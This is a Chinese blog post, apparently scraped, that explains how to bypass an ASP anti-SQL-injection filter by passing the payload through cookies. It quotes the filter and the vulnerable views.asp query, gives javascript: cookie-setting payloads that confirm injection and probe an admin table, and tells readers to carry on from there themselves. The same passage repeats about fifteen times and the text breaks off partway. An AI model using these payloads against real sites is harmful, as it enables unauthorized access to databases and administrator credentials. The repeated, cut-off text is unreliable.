清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44560) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44559) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44558) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44557) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44556) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44555) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44554) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44553) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44552) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44551) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44550) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44549) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44548) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44547) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44546) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44545) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
